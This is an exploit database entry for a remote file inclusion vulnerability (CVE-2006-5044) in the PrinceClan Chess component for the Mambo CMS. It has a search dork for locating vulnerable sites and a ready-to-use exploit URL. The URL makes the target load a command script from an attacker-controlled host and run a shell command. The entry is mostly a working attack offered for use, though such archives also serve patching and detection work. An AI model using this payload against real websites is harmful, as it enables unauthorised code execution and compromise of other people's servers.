Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

Author: OLiBekaS
type: webapps
platform: php
port: 
date_added: 2006-07-23  
date_updated:   
verified: 1  
codes: OSVDB-28083;CVE-2006-5044  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2069.txt  
# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-07-24]